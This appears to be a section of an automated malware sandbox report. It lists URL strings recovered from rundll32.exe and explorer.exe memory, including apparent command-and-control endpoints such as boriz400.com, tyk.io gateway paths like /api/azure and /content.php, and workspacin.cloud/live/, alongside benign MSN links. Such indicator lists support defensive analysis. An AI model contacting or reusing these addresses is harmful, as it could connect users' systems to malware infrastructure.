Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://boriz400.com/api/azure8
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://boriz400.com/api/azurey
                      Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/content.php
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/qa
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: explorer.exe, 00000016.00000002.2945125604.000000000B4AE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://illoskanawer.com/live/
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/
                      Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure
                      Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php
                      Source: rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4
                      Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA
                      Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL
                      Source: rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF
                      Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/
                      Source: rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/5/
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/F
                      Source: rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure
                      Source: rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(
                      Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure/j
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azureY
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurej
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php
                      Source: rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j
                      Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep://www.
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j
                      Source: rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php(
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/
                      Source: explorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/0vaH
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/6
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/J5
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
